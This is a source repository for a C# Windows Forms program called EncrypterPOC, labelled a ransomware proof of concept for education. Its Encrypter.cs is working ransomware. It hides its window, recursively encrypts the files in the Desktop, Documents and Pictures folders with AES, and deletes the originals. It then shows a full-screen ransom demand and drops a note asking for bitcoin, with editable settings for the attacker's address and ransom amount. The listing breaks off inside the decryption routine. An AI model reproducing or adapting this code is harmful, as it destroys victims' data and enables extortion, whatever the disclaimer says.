├── .gitignore
├── EncrypterPOC.sln
├── README.md
└── WindowsFormsApp1
    ├── App.config
    ├── Encrypter.Designer.cs
    ├── Encrypter.cs
    ├── Encrypter.resx
    ├── EncrypterPOC.csproj
    ├── Program.cs
    ├── Properties
        ├── AssemblyInfo.cs
        ├── Resources.Designer.cs
        ├── Resources.resx
        ├── Settings.Designer.cs
        └── Settings.settings
    ├── images
        ├── skull_rip.ico
        └── skull_rip.png
    └── skull_rip.ico


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | [Ll]ogs/
 33 | 
 34 | # Visual Studio 2015/2017 cache/options directory
 35 | .vs/
 36 | # Uncomment if you have tasks that create the project's static files in wwwroot
 37 | #wwwroot/
 38 | 
 39 | # Visual Studio 2017 auto generated files
 40 | Generated\ Files/
 41 | 
 42 | # MSTest test Results
 43 | [Tt]est[Rr]esult*/
 44 | [Bb]uild[Ll]og.*
 45 | 
 46 | # NUnit
 47 | *.VisualState.xml
 48 | TestResult.xml
 49 | nunit-*.xml
 50 | 
 51 | # Build Results of an ATL Project
 52 | [Dd]ebugPS/
 53 | [Rr]eleasePS/
 54 | dlldata.c
 55 | 
 56 | # Benchmark Results
 57 | BenchmarkDotNet.Artifacts/
 58 | 
 59 | # .NET Core
 60 | project.lock.json
 61 | project.fragment.lock.json
 62 | artifacts/
 63 | 
 64 | # StyleCop
 65 | StyleCopReport.xml
 66 | 
 67 | # Files built by Visual Studio
 68 | *_i.c
 69 | *_p.c
 70 | *_h.h
 71 | *.ilk
 72 | *.meta
 73 | *.obj
 74 | *.iobj
 75 | *.pch
 76 | *.pdb
 77 | *.ipdb
 78 | *.pgc
 79 | *.pgd
 80 | *.rsp
 81 | *.sbr
 82 | *.tlb
 83 | *.tli
 84 | *.tlh
 85 | *.tmp
 86 | *.tmp_proj
 87 | *_wpftmp.csproj
 88 | *.log
 89 | *.vspscc
 90 | *.vssscc
 91 | .builds
 92 | *.pidb
 93 | *.svclog
 94 | *.scc
 95 | 
 96 | # Chutzpah Test files
 97 | _Chutzpah*
 98 | 
 99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 | 
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 | 
116 | # Visual Studio Trace Files
117 | *.e2e
118 | 
119 | # TFS 2012 Local Workspace
120 | $tf/
121 | 
122 | # Guidance Automation Toolkit
123 | *.gpState
124 | 
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 | 
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 | 
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 | 
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 | 
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 | 
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 | 
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 | 
153 | # Web workbench (sass)
154 | .sass-cache/
155 | 
156 | # Installshield output folder
157 | [Ee]xpress/
158 | 
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 | 
169 | # Click-Once directory
170 | publish/
171 | 
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 | 
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 | 
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 | 
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 | 
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 | 
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 | 
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 | 
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 | 
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 | 
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 | 
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 | 
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 | 
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 | 
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 | 
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 | 
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 | 
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 | 
278 | # Visual Studio 6 build log
279 | *.plg
280 | 
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 | 
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 | 
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 | 
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 | 
299 | # FAKE - F# Make
300 | .fake/
301 | 
302 | # CodeRush personal settings
303 | .cr/personal
304 | 
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 | 
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 | 
313 | # Tabs Studio
314 | *.tss
315 | 
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 | 
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 | 
325 | # OpenCover UI analysis results
326 | OpenCover/
327 | 
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 | 
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 | 
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 | 
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 | 
340 | # Local History for Visual Studio
341 | .localhistory/
342 | 
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 | 
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 | 
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 | 


--------------------------------------------------------------------------------
/EncrypterPOC.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30804.86
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EncrypterPOC", "WindowsFormsApp1\EncrypterPOC.csproj", "{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{05C139EC-1F59-4BDF-8DEC-1D7100C6E4CC}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {5E2A1A45-CBC8-4287-88EA-199F36FA2BF9}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # EncrypterPOC
2 | 
3 | THIS IS A PROOF OF CONCEPT. DO NOT USE THIS TO COMMIT CRIME.
4 | I AM NOT RESPONSIBLE FOR YOU DOING DUMB STUFF.
5 | THIS SOURCE HAS BEEN USED AND MADE AVAILABLE FOR PRESENTATION AND EDUCATIONAL PURPOSES. 
6 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/WindowsFormsApp1/Encrypter.Designer.cs:
--------------------------------------------------------------------------------
  1 | 
  2 | namespace RansomwarePOC
  3 | {
  4 |     partial class Form1
  5 |     {
  6 |         /// <summary>
  7 |         /// Required designer variable.
  8 |         /// </summary>
  9 |         private System.ComponentModel.IContainer components = null;
 10 | 
 11 |         /// <summary>
 12 |         /// Clean up any resources being used.
 13 |         /// </summary>
 14 |         /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
 15 |         protected override void Dispose(bool disposing)
 16 |         {
 17 |             if (disposing && (components != null))
 18 |             {
 19 |                 components.Dispose();
 20 |             }
 21 |             base.Dispose(disposing);
 22 |         }
 23 | 
 24 |         #region Windows Form Designer generated code
 25 | 
 26 |         /// <summary>
 27 |         /// Required method for Designer support - do not modify
 28 |         /// the contents of this method with the code editor.
 29 |         /// </summary>
 30 |         private void InitializeComponent()
 31 |         {
 32 |             System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
 33 |             this.lblCount = new System.Windows.Forms.Label();
 34 |             this.lblBitcoinAmount = new System.Windows.Forms.Label();
 35 |             this.label2 = new System.Windows.Forms.Label();
 36 |             this.txtBitcoinAddress = new System.Windows.Forms.TextBox();
 37 |             this.txtEmailAddress = new System.Windows.Forms.TextBox();
 38 |             this.label3 = new System.Windows.Forms.Label();
 39 |             this.pictureBox1 = new System.Windows.Forms.PictureBox();
 40 |             this.label5 = new System.Windows.Forms.Label();
 41 |             ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
 42 |             this.SuspendLayout();
 43 |             // 
 44 |             // lblCount
 45 |             // 
 46 |             this.lblCount.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) 
 47 |             | System.Windows.Forms.AnchorStyles.Right)));
 48 |             this.lblCount.Font = new System.Drawing.Font("Microsoft Sans Serif", 27.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
 49 |             this.lblCount.ForeColor = System.Drawing.Color.White;
 50 |             this.lblCount.Location = new System.Drawing.Point(12, 425);
 51 |             this.lblCount.Name = "lblCount";
 52 |             this.lblCount.Size = new System.Drawing.Size(914, 55);
 53 |             this.lblCount.TabIndex = 0;
 54 |             this.lblCount.Text = "Your files (count: n) have been encrypted!";
 55 |             this.lblCount.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
 56 |             // 
 57 |             // lblBitcoinAmount
 58 |             // 
 59 |             this.lblBitcoinAmount.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) 
 60 |             | System.Windows.Forms.AnchorStyles.Right)));
 61 |             this.lblBitcoinAmount.Font = new System.Drawing.Font("Microsoft Sans Serif", 24F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
 62 |             this.lblBitcoinAmount.ForeColor = System.Drawing.Color.White;
 63 |             this.lblBitcoinAmount.Location = new System.Drawing.Point(12, 567);
 64 |             this.lblBitcoinAmount.Name = "lblBitcoinAmount";
 65 |             this.lblBitcoinAmount.Size = new System.Drawing.Size(914, 55);
 66 |             this.lblBitcoinAmount.TabIndex = 1;
 67 |             this.lblBitcoinAmount.Text = "Please send n Bitcoin(s) to the following BTC address:";
 68 |             this.lblBitcoinAmount.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
 69 |             // 
 70 |             // label2
 71 |             // 
 72 |             this.label2.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) 
 73 |             | System.Windows.Forms.AnchorStyles.Right)));
 74 |             this.label2.Font = new System.Drawing.Font("Microsoft Sans Serif", 24F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
 75 |             this.label2.ForeColor = System.Drawing.Color.White;
 76 |             this.label2.Location = new System.Drawing.Point(12, 672);
 77 |             this.label2.Name = "label2";
 78 |             this.label2.Size = new System.Drawing.Size(914, 55);
 79 |             this.label2.TabIndex = 2;
 80 |             this.label2.Text = "Next, E-mail your transaction ID to the following address:";
 81 |             this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
 82 |             // 
 83 |             // txtBitcoinAddress
 84 |             // 
 85 |             this.txtBitcoinAddress.Anchor = System.Windows.Forms.AnchorStyles.Bottom;
 86 |             this.txtBitcoinAddress.Font = new System.Drawing.Font("Microsoft Sans Serif", 24F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
 87 |             this.txtBitcoinAddress.Location = new System.Drawing.Point(136, 625);
 88 |             this.txtBitcoinAddress.Name = "txtBitcoinAddress";
 89 |             this.txtBitcoinAddress.ReadOnly = true;
 90 |             this.txtBitcoinAddress.Size = new System.Drawing.Size(677, 44);
 91 |             this.txtBitcoinAddress.TabIndex = 3;
 92 |             this.txtBitcoinAddress.Text = "1BtUL5dhVXHwKLqSdhjyjK9Pe64Vc6CEH1";
 93 |             this.txtBitcoinAddress.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
 94 |             // 
 95 |             // txtEmailAddress
 96 |             // 
 97 |             this.txtEmailAddress.Anchor = System.Windows.Forms.AnchorStyles.Bottom;
 98 |             this.txtEmailAddress.Font = new System.Drawing.Font("Microsoft Sans Serif", 24F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
 99 |             this.txtEmailAddress.Location = new System.Drawing.Point(136, 730);
100 |             this.txtEmailAddress.Name = "txtEmailAddress";
101 |             this.txtEmailAddress.ReadOnly = true;
102 |             this.txtEmailAddress.Size = new System.Drawing.Size(677, 44);
103 |             this.txtEmailAddress.TabIndex = 4;
104 |             this.txtEmailAddress.Text = "friendly.cyber.criminal@gmail.com";
105 |             this.txtEmailAddress.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
106 |             // 
107 |             // label3
108 |             // 
109 |             this.label3.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) 
110 |             | System.Windows.Forms.AnchorStyles.Right)));
111 |             this.label3.Font = new System.Drawing.Font("Microsoft Sans Serif", 27.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
112 |             this.label3.ForeColor = System.Drawing.Color.White;
113 |             this.label3.Location = new System.Drawing.Point(12, 480);
114 |             this.label3.Name = "label3";
115 |             this.label3.Size = new System.Drawing.Size(914, 87);
116 |             this.label3.TabIndex = 5;
117 |             this.label3.Text = "In order to recover your data...";
118 |             this.label3.TextAlign = System.Drawing.ContentAlignment.TopCenter;
119 |             // 
120 |             // pictureBox1
121 |             // 
122 |             this.pictureBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) 
123 |             | System.Windows.Forms.AnchorStyles.Left) 
124 |             | System.Windows.Forms.AnchorStyles.Right)));
125 |             this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
126 |             this.pictureBox1.Location = new System.Drawing.Point(298, 12);
127 |             this.pictureBox1.Name = "pictureBox1";
128 |             this.pictureBox1.Size = new System.Drawing.Size(343, 386);
129 |             this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom;
130 |             this.pictureBox1.TabIndex = 6;
131 |             this.pictureBox1.TabStop = false;
132 |             // 
133 |             // label5
134 |             // 
135 |             this.label5.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left) 
136 |             | System.Windows.Forms.AnchorStyles.Right)));
137 |             this.label5.Font = new System.Drawing.Font("Microsoft Sans Serif", 24F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
138 |             this.label5.ForeColor = System.Drawing.Color.Crimson;
139 |             this.label5.Location = new System.Drawing.Point(12, 777);
140 |             this.label5.Name = "label5";
141 |             this.label5.Size = new System.Drawing.Size(914, 71);
142 |             this.label5.TabIndex = 8;
143 |             this.label5.Text = ".";
144 |             this.label5.TextAlign = System.Drawing.ContentAlignment.MiddleCenter;
145 |             // 
146 |             // Form1
147 |             // 
148 |             this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
149 |             this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
150 |             this.BackColor = System.Drawing.Color.Crimson;
151 |             this.ClientSize = new System.Drawing.Size(938, 857);
152 |             this.Controls.Add(this.label5);
153 |             this.Controls.Add(this.label3);
154 |             this.Controls.Add(this.txtEmailAddress);
155 |             this.Controls.Add(this.txtBitcoinAddress);
156 |             this.Controls.Add(this.label2);
157 |             this.Controls.Add(this.lblBitcoinAmount);
158 |             this.Controls.Add(this.lblCount);
159 |             this.Controls.Add(this.pictureBox1);
160 |             this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow;
161 |             this.Name = "Form1";
162 |             this.Text = "Lol";
163 |             this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
164 |             this.Load += new System.EventHandler(this.Form1_Load);
165 |             ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
166 |             this.ResumeLayout(false);
167 |             this.PerformLayout();
168 | 
169 |         }
170 | 
171 |         #endregion
172 | 
173 |         private System.Windows.Forms.Label lblCount;
174 |         private System.Windows.Forms.Label lblBitcoinAmount;
175 |         private System.Windows.Forms.Label label2;
176 |         private System.Windows.Forms.TextBox txtBitcoinAddress;
177 |         private System.Windows.Forms.TextBox txtEmailAddress;
178 |         private System.Windows.Forms.Label label3;
179 |         private System.Windows.Forms.PictureBox pictureBox1;
180 |         private System.Windows.Forms.Label label5;
181 |     }
182 | }
183 | 
184 | 


--------------------------------------------------------------------------------
/WindowsFormsApp1/Encrypter.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.IO;
  3 | using System.Security.Cryptography;
  4 | using System.Windows.Forms;
  5 | 
  6 | namespace RansomwarePOC
  7 | {
  8 |     public partial class Form1 : Form
  9 |     {
 10 |         /*
 11 |          *  THIS IS A PROOF OF CONCEPT. DO NOT USE THIS TO COMMIT CRIME.
 12 |          *  I AM NOT RESPONSIBLE FOR YOU DOING DUMB STUFF.
 13 |          *  THIS SOURCE HAS BEEN USED AND MADE AVAILABLE
 14 |          *  FOR PRESENTATION AND EDUCATIONAL PURPOSES. 
 15 |          */
 16 | 
 17 | 
 18 | 
 19 |         // ----------- EDIT THESE VARIABLES FOR YOUR OWN USE CASE ----------- //
 20 | 
 21 |         private const bool DELETE_ALL_ORIGINALS = true; /* CAUTION */
 22 |         private const bool ENCRYPT_DESKTOP = true;
 23 |         private const bool ENCRYPT_DOCUMENTS = true;
 24 |         private const bool ENCRYPT_PICTURES = true;
 25 |         private const string ENCRYPTED_FILE_EXTENSION = ".jcrypt";
 26 |         private const string ENCRYPT_PASSWORD = "Password1";
 27 |         private const string BITCOIN_ADDRESS = "1BtUL5dhVXHwKLqSdhjyjK9Pe64Vc6CEH1";
 28 |         private const string BITCOIN_RANSOM_AMOUNT = "1";
 29 |         private const string EMAIL_ADDRESS = "this.email.address@gmail.com";
 30 | 
 31 |         // ----------------------------- END -------------------------------- //
 32 |         
 33 | 
 34 | 
 35 | 
 36 |         private static string ENCRYPTION_LOG = "";
 37 |         private string RANSOM_LETTER =
 38 |            "All of your files have been encrypted.\n\n" +
 39 |            "To unlock them, please send " + BITCOIN_RANSOM_AMOUNT + " bitcoin(s) to BTC address: " + BITCOIN_ADDRESS + "\n" +
 40 |            "Afterwards, please email your transaction ID to: " + EMAIL_ADDRESS + "\n\n" +
 41 |            "Thank you and have a nice day!\n\n" +
 42 |            "Encryption Log:\n" +
 43 |            "----------------------------------------\n";
 44 |         private string DESKTOP_FOLDER = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory);
 45 |         private string DOCUMENTS_FOLDER = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
 46 |         private string PICTURES_FOLDER = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures);
 47 |         private static int encryptedFileCount = 0;
 48 | 
 49 |         public Form1()
 50 |         {
 51 |             InitializeComponent();
 52 |         }
 53 | 
 54 |         private void Form1_Load(object sender, EventArgs e)
 55 |         {
 56 |             initializeForm();
 57 | 
 58 |             if (ENCRYPT_DESKTOP)
 59 |             {
 60 |                 encryptFolderContents(DESKTOP_FOLDER);
 61 |             }
 62 | 
 63 |             if (ENCRYPT_PICTURES)
 64 |             {
 65 |                 encryptFolderContents(PICTURES_FOLDER);
 66 |             }
 67 | 
 68 |             if (ENCRYPT_DOCUMENTS)
 69 |             {
 70 |                 encryptFolderContents(DOCUMENTS_FOLDER);
 71 |             }
 72 | 
 73 |             if (encryptedFileCount > 0)
 74 |             {
 75 |                 formatFormPostEncryption();
 76 |                 dropRansomLetter();
 77 |             }
 78 |             else
 79 |             {
 80 |                 Console.Out.WriteLine("No files to encrypt.");
 81 |                 Application.Exit();
 82 |             }
 83 |         }
 84 | 
 85 |         private void dropRansomLetter()
 86 |         {
 87 |             StreamWriter ransomWriter = new StreamWriter(DESKTOP_FOLDER + @"\___RECOVER__FILES__" + ENCRYPTED_FILE_EXTENSION + ".txt");
 88 |             ransomWriter.WriteLine(RANSOM_LETTER);
 89 |             ransomWriter.WriteLine(ENCRYPTION_LOG);
 90 |             ransomWriter.Close();
 91 |         }
 92 | 
 93 |         private void formatFormPostEncryption()
 94 |         {
 95 |             this.Opacity = 100;
 96 |             this.WindowState = FormWindowState.Maximized;
 97 |             lblCount.Text = "Your files (count: " + encryptedFileCount + ") have been encrypted!";
 98 |         }
 99 | 
100 |         private void initializeForm()
101 |         {
102 |             this.Opacity = 0;
103 |             this.ShowInTaskbar = false;
104 |             //this.WindowState = FormWindowState.Maximized;
105 |             lblBitcoinAmount.Text = "Please send " + BITCOIN_RANSOM_AMOUNT + " Bitcoin(s) to the following BTC address:";
106 |             txtBitcoinAddress.Text = BITCOIN_ADDRESS;
107 |             txtEmailAddress.Text = EMAIL_ADDRESS;
108 |             lblBitcoinAmount.Focus();
109 |         }
110 | 
111 |         static void encryptFolderContents(string sDir)
112 |         {
113 |             try
114 |             {
115 |                 foreach (string f in Directory.GetFiles(sDir))
116 |                 {
117 |                     if (!f.Contains(ENCRYPTED_FILE_EXTENSION)) {
118 |                         Console.Out.WriteLine("Encrypting: " + f);
119 |                         FileEncrypt(f, ENCRYPT_PASSWORD);
120 |                     }
121 |                 }
122 | 
123 |                 foreach (string d in Directory.GetDirectories(sDir))
124 |                 {
125 |                     encryptFolderContents(d);
126 |                 }
127 |             }
128 |             catch (System.Exception excpt)
129 |             {
130 |                 Console.WriteLine(excpt.Message);
131 |             }
132 |         }
133 | 
134 |         private static void FileEncrypt(string inputFile, string password)
135 |         {
136 |             //http://stackoverflow.com/questions/27645527/aes-encryption-on-large-files
137 |             //generate random salt
138 |             byte[] salt = GenerateRandomSalt();
139 | 
140 |             //create output file name
141 |             FileStream fsCrypt = new FileStream(inputFile + ENCRYPTED_FILE_EXTENSION, FileMode.Create);
142 | 
143 |             //convert password string to byte arrray
144 |             byte[] passwordBytes = System.Text.Encoding.UTF8.GetBytes(password);
145 | 
146 |             //Set Rijndael symmetric encryption algorithm
147 |             RijndaelManaged AES = new RijndaelManaged();
148 |             AES.KeySize = 256;
149 |             AES.BlockSize = 128;
150 |             AES.Padding = PaddingMode.PKCS7;
151 | 
152 |             //http://stackoverflow.com/questions/2659214/why-do-i-need-to-use-the-rfc2898derivebytes-class-in-net-instead-of-directly
153 |             //"What it does is repeatedly hash the user password along with the salt." High iteration counts.
154 |             var key = new Rfc2898DeriveBytes(passwordBytes, salt, 50000);
155 |             AES.Key = key.GetBytes(AES.KeySize / 8);
156 |             AES.IV = key.GetBytes(AES.BlockSize / 8);
157 | 
158 |             //Cipher modes: http://security.stackexchange.com/questions/52665/which-is-the-best-cipher-mode-and-padding-mode-for-aes-encryption
159 |             AES.Mode = CipherMode.CBC;
160 | 
161 |             // write salt to the begining of the output file, so in this case can be random every time
162 |             fsCrypt.Write(salt, 0, salt.Length);
163 | 
164 |             CryptoStream cs = new CryptoStream(fsCrypt, AES.CreateEncryptor(), CryptoStreamMode.Write);
165 | 
166 |             FileStream fsIn = new FileStream(inputFile, FileMode.Open);
167 | 
168 |             //create a buffer (1mb) so only this amount will allocate in the memory and not the whole file
169 |             byte[] buffer = new byte[1048576];
170 |             int read;
171 | 
172 |             try
173 |             {
174 |                 while ((read = fsIn.Read(buffer, 0, buffer.Length)) > 0)
175 |                 {
176 |                     //Application.DoEvents(); // -> for responsive GUI, using Task will be better!
177 |                     cs.Write(buffer, 0, read);
178 |                 }
179 | 
180 |                 // Close up
181 |                 fsIn.Close();
182 |             }
183 |             catch (Exception ex)
184 |             {
185 |                 Console.WriteLine("Error: " + ex.Message);
186 |             }
187 |             finally
188 |             {
189 |                 ENCRYPTION_LOG += inputFile + "\n";
190 |                 encryptedFileCount++;
191 |                 cs.Close();
192 |                 fsCrypt.Close();
193 |                 if (DELETE_ALL_ORIGINALS)
194 |                 {
195 |                     File.Delete(inputFile);
196 |                 }
197 |             }
198 |         }
199 | 
200 |         private static void FileDecrypt(string inputFile, string outputFile, string password)
201 |         {
202 |             byte[] passwordBytes = System.Text.Encoding.UTF8.GetBytes(password);
203 |             byte[] salt = new byte[32];
204 | 
205 |             FileStream cryptoFileStream = new FileStream(inputFile, FileMode.Open);
206 |             cryptoFileStream.Read(salt, 0, salt.Length);
207 | 
208 |             RijndaelManaged AES = new RijndaelManaged();
209 |             AES.KeySize = 256;
210 |             AES.BlockSize = 128;
211 |             var key = new Rfc2898DeriveBytes(passwordBytes, salt, 50000);
212 |             AES.Key = key.GetBytes(AES.KeySize / 8);
213 |             AES.IV = key.GetBytes(AES.BlockSize / 8);
214 |             AES.Padding = PaddingMode.PKCS7;
215 |             AES.Mode = CipherMode.CBC;
216 | 
